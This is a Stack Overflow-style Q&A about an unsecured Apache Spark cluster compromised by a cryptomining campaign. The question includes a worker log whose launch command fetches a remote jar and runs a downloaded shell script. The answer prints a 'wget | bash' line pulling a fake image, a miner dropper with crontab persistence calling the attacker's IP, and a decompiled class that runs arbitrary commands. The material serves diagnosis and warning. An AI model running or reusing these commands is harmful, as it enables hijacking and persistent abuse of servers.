# apache spark executor submit driver with exploit class

Tags: scala, apache-spark

After a lot search and research, I turn to find help here.
The problem is that once a Spark cluster is built(one master and 4 workers with different IP address), each executor will submit "driver" constantly. From web UI, I can see a class named "Exploit" submitted with the "driver". [web UI](https://i.stack.imgur.com/X5CpA.jpg)
Following is head and tail of log file of one worker.

> Launch Command: "/usr/lib/jvm/jdk1.8/jre/bin/java" "-cp" "/home/labuser/spark/conf/:/home/labuser/spark/jars/*" "-Xmx1024M" "-Dspark.eventLog.enabled=true" "-Dspark.driver.supervise=false" "-Dspark.submit.deployMode=cluster" "-Dspark.app.name=Exploit" "-Dspark.jars=http://192.99.142.226:8220/Exploit.jar" "-Dspark.master=spark://129.10.58.200:7077" "org.apache.spark.deploy.worker.DriverWrapper" "spark://Worker@129.10.58.202:44717" "/home/labuser/spark/work/driver-20180815111311-0065/Exploit.jar" "Exploit" "wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,bash /var/tmp/a.sh
>
> 18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.allocator.type: unpooled
>   18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.threadLocalDirectBufferSize: 65536
>   18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.maxThreadLocalCharBufferSize: 16384
>   18/08/15 11:13:56 DEBUG NetUtil: Loopback interface: lo (lo, 0:0:0:0:0:0:0:1%lo)
>   18/08/15 11:13:56 DEBUG NetUtil: /proc/sys/net/core/somaxconn: 128
>   18/08/15 11:13:57 DEBUG TransportServer: Shuffle server started on port: 46034
>   18/08/15 11:13:57 INFO Utils: Successfully started service 'Driver' on port 46034.
>   18/08/15 11:13:57 INFO WorkerWatcher: Connecting to worker spark://Worker@129.10.58.202:44717
>   18/08/15 11:13:58 DEBUG TransportClientFactory: Creating new connection to /129.10.58.202:44717
>   18/08/15 11:13:59 DEBUG AbstractByteBuf: -Dio.netty.buffer.bytebuf.checkAccessible: true
>   18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.level: simple
>   18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.maxRecords: 4
>   18/08/15 11:13:59 DEBUG ResourceLeakDetectorFactory: Loaded default ResourceLeakDetector: io.netty.util.ResourceLeakDetector@350d33b5
>   18/08/15 11:14:00 DEBUG TransportClientFactory: Connection to /129.10.58.202:44717 successful, running bootstraps...
>   18/08/15 11:14:00 INFO TransportClientFactory: Successfully created connection to /129.10.58.202:44717 after 1706 ms (0 ms spent in bootstraps)
>   18/08/15 11:14:00 INFO WorkerWatcher: Successfully connected to spark://Worker@129.10.58.202:44717
>   18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxCapacity.default: 32768
>   18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxSharedCapacityFactor: 2
>   18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.linkCapacity: 16
>   18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.ratio: 8

I found there is a "Exploit" code which hacks Spark cluster by taking advantage of the fact that anyone can submit applications to an unauthorized Spark cluster.

[ARBITRARY CODE EXECUTION IN UNSECURED APACHE SPARK CLUSTER](https://hacked.work/blog/arbitary-code-execution-in-unsecured-apache-spark-cluster/)

But I don't think my cluster is hacked. Cause after applying authorized mode, this problem still exists.

My question is anyone else have this problem? And why would this happen?

Comment: I'm not sure if this is a troll, but be careful when downloading the jar and shell script and do not execute anything.

Answer (score 1):

## THIS IS VERY ALARMING!

Firstly, the decompiled source code shows that the driver will execute commands supplied to it via arguments. In your case, this `wget` to download the script to temp, then execute it.

The downloaded script downloads a jpg and piped to bash. **THIS IS NOT AN IMAGE**

`wget -q -O - http://192.99.142.248:8220/logo10.jpg | bash -sh`

`logo10.jpg` contains a `cron` job that contains even more source code that will be run on your cluster. You are probably seeing this job being submitted because it is starting a scheduled job.

```
#!/bin/sh
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w sustes |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.248:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.248:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
```

### Decompiled Source

```
public class Exploit {
    public Exploit() {
    }

    public static void main(String[] var0) throws Exception {
        String[] var1 = var0[0].split(",");
        String[] var2 = var1;
        int var3 = var1.length;

        for(int var4 = 0; var4 < var3; ++var4) {
            String var5 = var2[var4];
            System.out.println(var5);
            System.out.println(executeCommand(var5.trim()));
            System.out.println("==============================================");
        }

    }

    private static String executeCommand(String var0) {
        StringBuilder var1 = new StringBuilder();

        try {
            Process var2 = Runtime.getRuntime().exec(var0);
            var2.waitFor();
            BufferedReader var3 = new BufferedReader(new InputStreamReader(var2.getInputStream()));

            String var4;
            while((var4 = var3.readLine()) != null) {
                var1.append(var4).append("\n");
            }
        } catch (Exception var5) {
            var5.printStackTrace();
        }

        return var1.toString();
    }
}
```

Comment: It is ALARMING !